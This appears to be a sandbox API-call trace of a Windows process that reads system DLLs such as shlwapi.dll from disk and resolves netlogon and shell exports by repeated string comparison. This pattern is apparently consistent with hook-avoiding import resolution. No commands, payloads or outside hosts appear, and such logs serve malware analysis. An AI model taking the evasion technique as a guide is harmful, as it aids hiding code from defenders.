lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0252.801] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0252.801] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0252.802] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0252.803] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0252.804] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0252.805] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.806] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.933] GetProcessHeap () returned 0x430000 [0252.934] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2c95030 | out: hHeap=0x430000) returned 1 [0252.934] GetProcessHeap () returned 0x430000 [0252.934] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4498a0 [0252.934] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0252.934] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.934] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.934] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0252.935] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0252.935] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.935] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.935] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0252.935] GetProcessHeap () returned 0x430000 [0252.935] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x51148) returned 0x2c95030 [0252.935] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.936] ReadFile (in: hFile=0x17c, lpBuffer=0x2c95030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c95030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0252.940] CloseHandle (hObject=0x17c) returned 1 [0252.941] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0252.941] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0252.941] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0252.941] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0252.941] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0252.941] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0252.941] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0252.941] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0252.941] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0252.941] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0252.941] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.942] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0252.942] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0252.943] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0252.943] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0252.943] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0252.943] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0252.943] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 